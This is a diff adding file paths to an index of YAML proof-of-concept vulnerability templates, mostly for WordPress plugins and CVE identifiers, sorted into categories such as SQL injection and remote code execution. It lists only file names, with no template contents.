./poc/other/indeed-membership-pro-5d47e243e254d1baa4cd23914b0a4b5c.yaml
./poc/other/indeed-membership-pro-61d0345af5bd458935f32bc02960667b.yaml
./poc/other/indeed-membership-pro-64a53bf07001495502b280340bedc78c.yaml
@@ -75619,9 +75732,11 @@
./poc/other/indeed-membership-pro-ab485d9a6d288626aae7e73e1ed249d0.yaml
./poc/other/indeed-membership-pro-af19c70bbc3d03b63f972ccb6af47984.yaml
./poc/other/indeed-membership-pro-b0a56eadad3039f40c1e65bbd12111c4.yaml
+./poc/other/indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b.yaml
./poc/other/indeed-membership-pro-d37c0187be48f6315a0b8912f2a110d6.yaml
./poc/other/indeed-membership-pro-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/indeed-membership-pro-e3649b3103c03fdfd2721c6009fbc8cd.yaml
+./poc/other/indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a.yaml
./poc/other/indeed-membership-pro-f98376cb2d870374e021e1e6add4ec0c.yaml
./poc/other/indeed-membership-pro-fd95aa74f1e4a3f0ca466f92f001062c.yaml
./poc/other/indeed-membership-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -75952,6 +76067,7 @@
./poc/other/invitation-code-content-access-4aafe7d4acbe65841e2042718ad9bb06.yaml
./poc/other/invitation-code-content-access.yaml
./poc/other/invite-anyone-08b92f6ed0c77582a2df5e0118f3236b.yaml
+./poc/other/invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2.yaml
./poc/other/invite-anyone-7a771f69129cee8150df8e368d05c8a3.yaml
./poc/other/invite-anyone-a3855c7df99c9089e4b9bc829589503f.yaml
./poc/other/invite-anyone-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -77229,6 +77345,7 @@
./poc/other/learn-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/learn-manager-plugin.yaml
./poc/other/learn-manager.yaml
+./poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml
./poc/other/learning-management-system-6c0e04cbc2da4388f81a8caa6d6b8191.yaml
./poc/other/learning-management-system-7c31e6671c937327ff1564eccbf43be8.yaml
./poc/other/learning-management-system-d39d6c1f84e5236c7d49d1e68072221d.yaml
@@ -78664,6 +78781,7 @@
./poc/other/mediavine-control-panel-c635bfd174639f61c365b808c8ca4593.yaml
./poc/other/mediavine-control-panel.yaml
./poc/other/mediavine-create-35e98f5a974573af01f65035bbe38912.yaml
+./poc/other/mediavine-create-621425e43450aac270f2eee9af5c5ee9.yaml
./poc/other/mediavine-create-fa32f81d47f0482b51953006aebf3aa1.yaml
./poc/other/mediavine-create.yaml
./poc/other/medibazar-9dfdafdab71caf1c953586be77677f3e.yaml
@@ -79244,6 +79362,7 @@
./poc/other/modal-window-608e913de73744ebb0ca00e95ef5d993.yaml
./poc/other/modal-window-918bfee3366f29426807ea0f4ccd9036.yaml
./poc/other/modal-window-b4297a97da0c3ffb6b4810113c1e1d81.yaml
+./poc/other/modal-window-d5049720f6b9e25c27b98f22996df247.yaml
./poc/other/modal-window.yaml
./poc/other/modal_survey-2daa2b2b5e101afb9d69636e32f88c70.yaml
./poc/other/modal_survey-34b457eeb84c933881032142c45484d8.yaml
@@ -79711,6 +79830,7 @@
./poc/other/mybb-forum-install.yaml
./poc/other/mybb.yaml
./poc/other/myblogu.yaml
+./poc/other/mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769.yaml
./poc/other/mybooktable-50a0b0e273ccd0ef710f5b593260e684.yaml
./poc/other/mybooktable-5a2111311b69937a869fb11135af3fa1.yaml
./poc/other/mybooktable-70828a884c226a608e2e7d2f5baaea57.yaml
@@ -80961,6 +81081,7 @@
./poc/other/orangehrm-installer.yaml
./poc/other/orangehrm.yaml
./poc/other/orangescrum-install.yaml
+./poc/other/orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac.yaml
./poc/other/orbisius-child-theme-creator-4b510f2cf596091cd1255e3e65f8c9ac.yaml
./poc/other/orbisius-child-theme-creator-a28a3d5449e1b7d7ce99381c441dff20.yaml
./poc/other/orbisius-child-theme-creator.yaml
@@ -81123,6 +81244,7 @@
./poc/other/pacs-connexion-utilisateur.yaml
./poc/other/page-and-post-restriction-bb6761a5115838d81d6e251362c2868d.yaml
./poc/other/page-and-post-restriction.yaml
+./poc/other/page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8.yaml
./poc/other/page-builder-add-6646984be2a8266aaf9306caac9ad1d3.yaml
./poc/other/page-builder-add-8985f563f4f151ac79c51c95fa9f19b0.yaml
./poc/other/page-builder-add-99cdfaebe5c090667cc6d5f44256a1d0.yaml
@@ -81893,6 +82015,7 @@
./poc/other/pinterest.yaml
./poc/other/pintrest-phish.yaml
./poc/other/piotnet-addons-for-elementor-1f46109352a954ec8f136bcbc5fe8ad7.yaml
+./poc/other/piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5.yaml
./poc/other/piotnet-addons-for-elementor-b20295143018b856494f75c508820e5f.yaml
./poc/other/piotnet-addons-for-elementor-b5b7fc63b6c4a91856192ed2320da581.yaml
./poc/other/piotnet-addons-for-elementor-cfb215fb0afbf53ed07cc44d5a98cfe3.yaml
@@ -83123,6 +83246,7 @@
./poc/other/propertyhive-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/propertyhive-plugin.yaml
./poc/other/propertyhive.yaml
+./poc/other/propovoice-c028c15a3dc86a47681670ace75ba13e.yaml
./poc/other/propovoice-fec98ad857d532565cf2b8daac541c01.yaml
./poc/other/propovoice.yaml
./poc/other/proquoter-d307dfdaf331e3b386f7078b98a1c2c8.yaml
@@ -83225,6 +83349,7 @@
./poc/other/pure-chat-df530c7666ae8fd104d667c14e462955.yaml
./poc/other/pure-chat.yaml
./poc/other/puridiom.yaml
+./poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml
./poc/other/purosa-b49dafa9501f406e94b1c544d3cb4ee0.yaml
./poc/other/purosa.yaml
./poc/other/purus-76c6b84ccd9f6bd60eada03675ff7bce.yaml
@@ -84241,6 +84366,7 @@
./poc/other/responsive-add-ons-plugin.yaml
./poc/other/responsive-add-ons.yaml
./poc/other/responsive-b35acf8634721bd8b2254b89aad90bd4.yaml
+./poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml
./poc/other/responsive-c567878f616fa78cef0a6bc18a4ad518.yaml
./poc/other/responsive-category-slider.yaml
./poc/other/responsive-column-widgets-10174a5bcac9bad47e8550b3d07ca19d.yaml
@@ -84971,6 +85097,7 @@
./poc/other/salon-booking-system-4ea6d28e68bcbf5d357dc84d7792878d.yaml
./poc/other/salon-booking-system-525a2553e2958053e41ef8fef4652482.yaml
./poc/other/salon-booking-system-55186e56046e33e0cca9c47f9f3d9e22.yaml
+./poc/other/salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b.yaml
./poc/other/salon-booking-system-6fd64ddfb4c95625a5a0801ecf3eac31.yaml
./poc/other/salon-booking-system-7207ea24e0d58e9f42d09a61466f74dc.yaml
./poc/other/salon-booking-system-721a66b7e80a6749fcd912a2dd813cbe.yaml
@@ -87593,6 +87720,7 @@
./poc/other/store-locator-d4a60c9fc5cffc80560c943955e1ab15.yaml
./poc/other/store-locator-dd482f074d477676aa8777900bb798c3.yaml
./poc/other/store-locator-le-1283ee32d4f50f1e49de2f7b5adec7a7.yaml
+./poc/other/store-locator-le-1945eefef5d2527af79b680ff46e0cd5.yaml
./poc/other/store-locator-le-a91e0c069a35e1bc88978709b855d6dd.yaml
./poc/other/store-locator-le-b8e7cb24bf7c744f84f9fc54eed7b8aa.yaml
./poc/other/store-locator-le-cc8f62949d87a65c3d86f5a8c42aa4e6.yaml
@@ -87709,6 +87837,7 @@
./poc/other/structured-content-221291df1a9cc1f7833e5dce6cff0b77.yaml
./poc/other/structured-content-79949280778ecf47288898565d146f26.yaml
./poc/other/structured-content-80bdfd3e2031392260ba3a35a2af56b7.yaml
+./poc/other/structured-content-c817ba2ce17903cc737df2e15e7a24ee.yaml
./poc/other/structured-content.yaml
./poc/other/structurizr-panel.yaml
./poc/other/studiozen-16958f969761610f7adf36067afa2d81.yaml
@@ -88313,6 +88442,7 @@
./poc/other/teachpress.yaml
./poc/other/team-0fa973a5c2b71f4a5be9030b88186095.yaml
./poc/other/team-206abb9b15870411c833af9aa0f93f3b.yaml
+./poc/other/team-9f214d2d0b43c932c0c20f490727942d.yaml
./poc/other/team-ac3c833ad815af1432a607ddd70e6c4e.yaml
./poc/other/team-board.yaml
./poc/other/team-f38f21f2e660a6510599ad0cfa5238c3.yaml
@@ -89440,6 +89570,7 @@
./poc/other/tutor-6c03efd47f65b6074ccc9ee2526f1292.yaml
./poc/other/tutor-71c5ddae6a81b95766888afa1d1c01c3.yaml
./poc/other/tutor-7295d11162814fb0ba1c6d580570a210.yaml
+./poc/other/tutor-73b95a02c60b2d8fc29e4d380e9a408f.yaml
./poc/other/tutor-7ea8c00918b2b7a0dd4f6b321b5ef053.yaml
./poc/other/tutor-7f430702e5f2f8d47d2f5aa211b77b70.yaml
./poc/other/tutor-97a3d5e265108ef50d642d0296d79c3b.yaml
@@ -89919,6 +90050,7 @@
./poc/other/ultimate-reviews-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/ultimate-reviews-e4710dde34171f45446a0fc70c5bc516.yaml
./poc/other/ultimate-reviews.yaml
+./poc/other/ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb.yaml
./poc/other/ultimate-store-kit-a642a01295abf57e7ebc62409ec7af27.yaml
./poc/other/ultimate-store-kit-e2efcb1d97a97f985d85c8b996d104ab.yaml
./poc/other/ultimate-store-kit.yaml
@@ -90913,6 +91045,7 @@
./poc/other/visnesscard.yaml
./poc/other/vistered-little-bb15fc0afbd39462bbb4450087669bb5.yaml
./poc/other/vistered-little.yaml
+./poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml
./poc/other/visual-form-builder-355778cd9ce14bd4396f412f1952e5bb.yaml
./poc/other/visual-form-builder-5e4ed275d9505a830c27353ad55f8a35.yaml
./poc/other/visual-form-builder-72503cf643bf257391bc9aa733939b75.yaml
@@ -91515,6 +91648,7 @@
./poc/other/wellcare-health-management-system.yaml
./poc/other/wemail-307c045ce407a6d8e70ca844a5900ee8.yaml
./poc/other/wemail-55347e9ac58126992d50d45693e54288.yaml
+./poc/other/wemail-5fb8bcbdd6e11191313c75649788eb26.yaml
./poc/other/wemail-621a86ac69fc43f58c97e1a34ee9115f.yaml
./poc/other/wemail-ebaa67c580f393a8a3d2ab9cc65cf0ac.yaml
./poc/other/wemail.yaml
@@ -91577,6 +91711,8 @@
./poc/other/whmcs-bridge-8483c41059b1a8e448d35ba9865eee4d.yaml
./poc/other/whmcs-bridge.yaml
./poc/other/whmcs.yaml
+./poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml
+./poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml
./poc/other/who-hit-the-page-hit-counter-89883786f75e8dc84847064827029c37.yaml
./poc/other/who-hit-the-page-hit-counter-a1e508b6aa56ac41251dd289b91ee3dd.yaml
./poc/other/who-hit-the-page-hit-counter-a8aa7e6da9021bb8e7c5234d4deec357.yaml
@@ -92147,6 +92283,7 @@
./poc/other/woo-product-variation-gallery.yaml
./poc/other/woo-product-variation-swatches-a2f872a236d04ab5253c686b42cdd622.yaml
./poc/other/woo-product-variation-swatches.yaml
+./poc/other/woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3.yaml
./poc/other/woo-products-widgets-for-elementor-42185b875105a7f60d9e9dab75c7a958.yaml
./poc/other/woo-products-widgets-for-elementor-899c764ee1e1018364a0620ec38aa86d.yaml
./poc/other/woo-products-widgets-for-elementor.yaml
@@ -93184,6 +93321,7 @@
./poc/other/zephyr-project-manager-22340cb944c0e6f8c82963bd053d9524.yaml
./poc/other/zephyr-project-manager-281bf1419f5dfa8b5e2c3047ef4d04b2.yaml
./poc/other/zephyr-project-manager-5501cefe800a394ae352be7ac62fa02d.yaml
+./poc/other/zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5.yaml
./poc/other/zephyr-project-manager-85e7c465d69b6dda44532e33fc83909c.yaml
./poc/other/zephyr-project-manager-87ce4b87af0b3ebc185689714b157b24.yaml
./poc/other/zephyr-project-manager-8ba2c39394e29aba6053c8c245fd4e4f.yaml
@@ -95022,6 +95160,7 @@
./poc/remote_code_execution/enhanced-e-commerce-for-woocommerce-store.yaml
./poc/remote_code_execution/enquiry-quotation-for-woocommerce-a7fdc5e1592a2afb36d817361aee6e46.yaml
./poc/remote_code_execution/enquiry-quotation-for-woocommerce.yaml
+./poc/remote_code_execution/envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b.yaml
./poc/remote_code_execution/envo-elementor-for-woocommerce-6ef08399a8d4914f769bd3119ca6cdfa.yaml
./poc/remote_code_execution/envo-elementor-for-woocommerce-afd2dc65a8882f6640770f804f5e6346.yaml
./poc/remote_code_execution/envo-elementor-for-woocommerce-befe5bd2f4e2538c3bfd66b63bd45b64.yaml
@@ -95612,6 +95751,7 @@
./poc/remote_code_execution/order-delivery-date-for-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/remote_code_execution/order-delivery-date-for-woocommerce-plugin.yaml
./poc/remote_code_execution/order-delivery-date-for-woocommerce.yaml
+./poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml
./poc/remote_code_execution/order-import-export-for-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml
./poc/remote_code_execution/order-import-export-for-woocommerce-deb2f706b61560f21bb9bc439367e4c9.yaml
./poc/remote_code_execution/order-import-export-for-woocommerce-fd8db3c088a1878860378bbefce894e8.yaml
@@ -96567,6 +96707,7 @@
./poc/remote_code_execution/woocommerce-abandoned-cart-pro-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/remote_code_execution/woocommerce-abandoned-cart-pro.yaml
./poc/remote_code_execution/woocommerce-abandoned-cart.yaml
+./poc/remote_code_execution/woocommerce-ac6e420a89669f08a078e821281eeac7.yaml
./poc/remote_code_execution/woocommerce-aca3807d00a87f905398f905ab21abbe.yaml
./poc/remote_code_execution/woocommerce-ad248c92593e9313c82d40a87bbf306c.yaml
./poc/remote_code_execution/woocommerce-add-to-cart-custom-redirect-64a9b17becafc7bb8d1d5b45684524cd.yaml
@@ -98355,6 +98496,7 @@
./poc/search/wp-custom-fields-search.yaml
./poc/search/wp-extended-search-d8fbdd78783ed9fee39d4591d264abf7.yaml
./poc/search/wp-extended-search.yaml
+./poc/search/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml
./poc/search/wp-jobsearch-0964abf3a2489fe0875449d31d844760.yaml
./poc/search/wp-jobsearch-09acb8c3e4b49f60dcdc9014584ef5ad.yaml
./poc/search/wp-jobsearch-0deb25d5fcf2be67833c2b15c50bc0a1.yaml
@@ -101418,6 +101560,7 @@
./poc/sql/CVE-2024-3813-fd8332d82db1e16b4fc3acea6f70b7f5.yaml
./poc/sql/CVE-2024-38671-cc011c6652e6bb4e9856964db8a794f2.yaml
./poc/sql/CVE-2024-38673-497a27b08c38d02abbc2917aefcdbaf2.yaml
+./poc/sql/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml
./poc/sql/CVE-2024-38678-264072720f6db401dc8ab66f48c30963.yaml
./poc/sql/CVE-2024-38691-fd15e4dd009993f021ad220fc706dbe2.yaml
./poc/sql/CVE-2024-38693-0072f6073736ce2db6bf5f2612a21d20.yaml
@@ -101470,10 +101613,22 @@
./poc/sql/CVE-2024-43149-48bd2fb7dfa7c0ba66333db47a7aa078.yaml
./poc/sql/CVE-2024-43230-9e8adb139a0d7ed623bea89f5702e850.yaml
./poc/sql/CVE-2024-4324-83e6d760adb900f9290e996e03752999.yaml
+./poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml
+./poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml
+./poc/sql/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml
+./poc/sql/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml
+./poc/sql/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml
+./poc/sql/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml
+./poc/sql/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml
+./poc/sql/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml
+./poc/sql/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml
./poc/sql/CVE-2024-43291-dabd8edbe180773a366911d00bf7b3d8.yaml
./poc/sql/CVE-2024-43294-74cdcbe12dafdf14c55db65337423666.yaml
./poc/sql/CVE-2024-43301-e70a166216c8c165db0d83860ef1272c.yaml
+./poc/sql/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml
./poc/sql/CVE-2024-43336-28f522c815326c862a095ad99702db7f.yaml
+./poc/sql/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml
+./poc/sql/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml
./poc/sql/CVE-2024-4344-c795caf4db9f9f708810052f2a459981.yaml
./poc/sql/CVE-2024-4346-3eb448297924902e8da132dbf247a5c3.yaml
./poc/sql/CVE-2024-4347-058d731900c2db8ba3484ed32650ada1.yaml
@@ -101588,6 +101743,7 @@
./poc/sql/CVE-2024-7027-90534f21ba7ac35c6aefb4db06d95b2d.yaml
./poc/sql/CVE-2024-7092-4edc2efb8d8dec4f4786c242db407100.yaml
./poc/sql/CVE-2024-7145-4e8d81a353841cdd435dbb6eddfecc6d.yaml
+./poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
./poc/sql/CVE-2024-7301-b82f30bc7f77018db154ad54534c5d05.yaml
./poc/sql/CVE-2024-7302-b9e037a9c7ecf1544ad73a0b3afdbb7d.yaml
./poc/sql/CVE-2024-7390-c6e14cdb3bb6b824b90602f2e8d31a7e.yaml
@@ -102585,6 +102741,7 @@
./poc/sql/complianz-gdpr-47631567152b7ae9db654f97578c32bd.yaml
./poc/sql/complianz-gdpr-57c6888ced10b936db3b5ad6f04d5907.yaml
./poc/sql/complianz-gdpr-dba1ff9fb5baa97496a228b9524e2848.yaml
+./poc/sql/compute-links-a7a90df4c2ee2fb79d7db37dc725b006.yaml
./poc/sql/conditional-menus-c1c870bdb34dcd5f0929b33c1544b025.yaml
./poc/sql/coneblog-widgets-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/configurable-tag-cloud-widget-ca276d47d9ec19544f581dbe03805651.yaml
@@ -103667,6 +103824,7 @@
./poc/sql/hooked-editable-content-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/horizontal-scrolling-announcement-2e09c7979ecd80207aa4140ca81db946.yaml
./poc/sql/hostel-14d486bd9a23dbb508df7de81fc903b5.yaml
+./poc/sql/houzez-9a635670fedb497fead8ede7dc06b417.yaml
./poc/sql/houzez-crm-3ca1b066cb1415aacdb3198d062d0872.yaml
./poc/sql/houzez-login-register-bb43e7e2104f92ffb17608db5afe8e6a.yaml
./poc/sql/hqtheme-extra-6477bf18cad6c823db485408d49b337b.yaml
@@ -103678,6 +103836,7 @@
./poc/sql/html5-maps-09431ac7051652adb8e4fb2e66a5b8db.yaml
./poc/sql/html5-mp3-player-with-mp3-folder-feedburner-playlist-8184d8d92561017974e3799804b8964f.yaml
./poc/sql/html5-mp3-player-with-mp3-folder-feedburner-playlist.yaml
+./poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml
./poc/sql/huatian-oa-sqli.yaml
./poc/sql/huatian-oa-workFlowService-sqli.yaml
./poc/sql/hub2word-19da068002cca60260bcb7db1e405192.yaml
@@ -104254,6 +104413,7 @@
./poc/sql/new-video-gallery-9352db8e65ccbade06069fb091692d87.yaml
./poc/sql/news-wall-a4b8ad9f0076a0ef1baa7dbdb2b571b6.yaml
./poc/sql/newsletter-by-supsystic-466dcf8e4e9a002d112948258edb5d41.yaml
+./poc/sql/newsletters-lite-5aa068832cbc4a3ddba8709b001a467b.yaml
./poc/sql/newsmag-cdb01ef22f4b446312ace084de576ddb.yaml
./poc/sql/newspaper-a89f41cc43cdb51913109cc90cee59b5.yaml
./poc/sql/newspaper-lite-65373f34e6552a5b8edb7c5dd6a66e65.yaml
@@ -105495,6 +105655,7 @@
./poc/sql/ultimate-addons-for-beaver-builder-34db2e68002bdcff6df9cc2b0342a97b.yaml
./poc/sql/ultimate-addons-for-beaver-builder-lite-db7ccd53f2144783cf49bfe0f1b97f4c.yaml
./poc/sql/ultimate-addons-for-contact-form-7-5ed2db34684463722f6aeee2145b6b0a.yaml
+./poc/sql/ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457.yaml
./poc/sql/ultimate-addons-for-gutenberg-065ff4b220c4adbae27e68e9a535def4.yaml
./poc/sql/ultimate-addons-for-gutenberg-134fe25d3afd0b58ebfd082519f2dbc6.yaml
./poc/sql/ultimate-addons-for-gutenberg-a7f33f5aa50a3dbe653e586fdada87c9.yaml
@@ -105642,6 +105803,7 @@
./poc/sql/vm-backups-12b774c15753bb5db557b2a48b74ffd4.yaml
./poc/sql/vm-backups-f2e7c5b0dbc2075489d2b8e2144f3c4b.yaml
./poc/sql/vo-locator-the-wp-store-locator-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449.yaml
./poc/sql/vospari-forms-e9bd69dbdf78833ce2843fc07cba7b74.yaml
./poc/sql/vslider-0be0a4f63adb92ae4208f6a727d13b8b.yaml
./poc/sql/vslider-e1bdb30b8c1c06b5ace271f8d6ebaff0.yaml
@@ -106442,6 +106604,7 @@
./poc/sql/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml
./poc/sql/wpforms-lite-66ca6dbf7e54d3f9d0cc66ebad78a311.yaml
./poc/sql/wpforo-04b9b42183fab163d0ecfec567eac5db.yaml
+./poc/sql/wpforo-3618db85525168de727aa60e2eab2dfa.yaml
./poc/sql/wpforo-eeecbea748b4788b1e8348663a9cddb1.yaml
./poc/sql/wpfront-notification-bar-57b2f88e0b70c7c74d9ac4dbdb8b5471.yaml
./poc/sql/wpgsi-6477bf18cad6c823db485408d49b337b.yaml
@@ -111159,6 +111322,8 @@
./poc/wordpress/lean-wp-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/lean-wp-plugin.yaml
./poc/wordpress/lean-wp.yaml
+./poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml
+./poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml
./poc/wordpress/lim4wp-6355cc5298b74aae91fbc3add72431cc.yaml
./poc/wordpress/lim4wp-85c0c2a57191d8f1425d9f6b31a4f872.yaml
./poc/wordpress/lim4wp-bdfc359e3288238435c76be20d0c749a.yaml
@@ -113011,6 +113176,7 @@
./poc/wordpress/wp-analytify-307a5a12c92c01b389dc7c1f52b86aae.yaml
./poc/wordpress/wp-analytify-329ec47c91ef1d46bafc7ee456d12278.yaml
./poc/wordpress/wp-analytify-46508e119f7d54bc836c0dcdbec0cd5d.yaml
+./poc/wordpress/wp-analytify-690113e54f3bf0d5f9d38a1c0e496671.yaml
./poc/wordpress/wp-analytify-6c86fdf8dce22ef2f51c32ba6445a1b9.yaml
./poc/wordpress/wp-analytify-88d65847c7b6798961eec6de24dcf89b.yaml
./poc/wordpress/wp-analytify-8bab483e91c9562c4a46ba23e2da55b3.yaml
@@ -113132,10 +113298,13 @@
./poc/wordpress/wp-backgrounds-lite.yaml
./poc/wordpress/wp-backitup-4465d9b33aea3fb4f708ca44e3512de4.yaml
./poc/wordpress/wp-backitup-45e44c833a725a83e13f239184d655f0.yaml
+./poc/wordpress/wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef.yaml
./poc/wordpress/wp-backitup-81a6fae0a36ba854bcee37c800e3c80e.yaml
./poc/wordpress/wp-backitup-8c8afa4d6c717d48d150ea8ee844a666.yaml
./poc/wordpress/wp-backitup-d41d8cd98f00b204e9800998ecf8427e.yaml
+./poc/wordpress/wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26.yaml
./poc/wordpress/wp-backitup-f83c70e3caa4f751a4286ba45e2a1ca7.yaml
+./poc/wordpress/wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3.yaml
./poc/wordpress/wp-backitup-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wp-backitup-plugin.yaml
./poc/wordpress/wp-backitup.yaml
@@ -114198,6 +114367,7 @@
./poc/wordpress/wp-file-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wp-file-manager-plugin.yaml
./poc/wordpress/wp-file-manager-pro-496430aebc118064e7ec23d62d986787.yaml
+./poc/wordpress/wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f.yaml
./poc/wordpress/wp-file-manager-pro-e692c282371b8d1b4dcb26c52c89e7cd.yaml
./poc/wordpress/wp-file-manager-pro-fea69044b80e2364d98228b5dbe70fe5.yaml
./poc/wordpress/wp-file-manager-pro.yaml
@@ -114748,6 +114918,7 @@
./poc/wordpress/wp-job-portal-3ed29051521d7b123afa881d9f582a09.yaml
./poc/wordpress/wp-job-portal-6991636be674dec0e6ae129f466cf764.yaml
./poc/wordpress/wp-job-portal-715d52378457a7ac370cc45a9dc1e067.yaml
+./poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml
./poc/wordpress/wp-job-portal-a5bdc2b0068a1c535dc51453d211dcd6.yaml
./poc/wordpress/wp-job-portal-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wp-job-portal-d51f4fd87b69ac765648da293bd32a31.yaml
@@ -114761,6 +114932,7 @@
./poc/wordpress/wp-jobs-60dedaec1dd5894ea2c041f7a03c3f01.yaml
./poc/wordpress/wp-jobs-fa1f4667d5ac84642e2aab4facec62ac.yaml
./poc/wordpress/wp-jobs.yaml
+./poc/wordpress/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml
./poc/wordpress/wp-jobsearch-0964abf3a2489fe0875449d31d844760.yaml
./poc/wordpress/wp-jobsearch-09acb8c3e4b49f60dcdc9014584ef5ad.yaml
./poc/wordpress/wp-jobsearch-0deb25d5fcf2be67833c2b15c50bc0a1.yaml
@@ -114917,6 +115089,7 @@
./poc/wordpress/wp-lister-for-amazon.yaml
./poc/wordpress/wp-lister-for-ebay-2797702b855bbd02310eb576c4e2b739.yaml
./poc/wordpress/wp-lister-for-ebay-2fcccfd74cb4a5df1bc99522367e4fea.yaml
+./poc/wordpress/wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871.yaml
./poc/wordpress/wp-lister-for-ebay-9a24f509c2fa764beb4fea7de561b115.yaml
./poc/wordpress/wp-lister-for-ebay.yaml
./poc/wordpress/wp-listings-0c160c0f03550008756b1f68b960b59c.yaml
@@ -115718,6 +115891,8 @@
./poc/wordpress/wp-pro-quiz-ad46cba696b2795a7f99c34b1c5adcb7.yaml
./poc/wordpress/wp-pro-quiz.yaml
./poc/wordpress/wp-product-feed-manager-1366b5506eb3697685f97d307ede6558.yaml
+./poc/wordpress/wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55.yaml
+./poc/wordpress/wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5.yaml
./poc/wordpress/wp-product-feed-manager-ffd7cfdedd3289922f8c39667b26424c.yaml
./poc/wordpress/wp-product-feed-manager.yaml
./poc/wordpress/wp-product-review-1a23fd7aed28f7e3e99029e2466cc057.yaml
@@ -116749,6 +116924,7 @@
./poc/wordpress/wp-translitera.yaml
./poc/wordpress/wp-travel-71620b005bcbf2aee9f61b11bd4c7a65.yaml
./poc/wordpress/wp-travel-a5c7da051e57e878aa92aaa58a089e18.yaml
+./poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml
./poc/wordpress/wp-travel-engine-5dbbaad444b84209703eb55cd167d8a5.yaml
./poc/wordpress/wp-travel-engine-6477bf18cad6c823db485408d49b337b.yaml
./poc/wordpress/wp-travel-engine-95a033691d3f2bc9fa850c217ca94e96.yaml
@@ -117463,8 +117639,10 @@
./poc/wordpress/wpforo-15704f1e6f9ac4aef25e7f970e62d77c.yaml
./poc/wordpress/wpforo-1d51b22e96a973d76e6cd2a2b23973bf.yaml
./poc/wordpress/wpforo-1e1cee395da2709f43055d35dac994e6.yaml
+./poc/wordpress/wpforo-3618db85525168de727aa60e2eab2dfa.yaml
./poc/wordpress/wpforo-4ee11858ba054f1b65dc6f58388e221b.yaml
./poc/wordpress/wpforo-527c1cbc14f273847e06d2147bbd6bac.yaml
+./poc/wordpress/wpforo-65d61d404575f7ac7abdc6590b29296c.yaml
./poc/wordpress/wpforo-68370149b2ad708b657f9f7eff464149.yaml
./poc/wordpress/wpforo-9825e89e13b9f57246a3f81b72a27574.yaml
./poc/wordpress/wpforo-a24f48ab001f516ee4a4783f2bcaf0ea.yaml
@@ -117869,6 +118047,7 @@
./poc/wordpress/wpsynchro.yaml
./poc/wordpress/wptables-1c8f16aeda7755bc222dcfdc54f2e9b8.yaml
./poc/wordpress/wptables.yaml
+./poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml
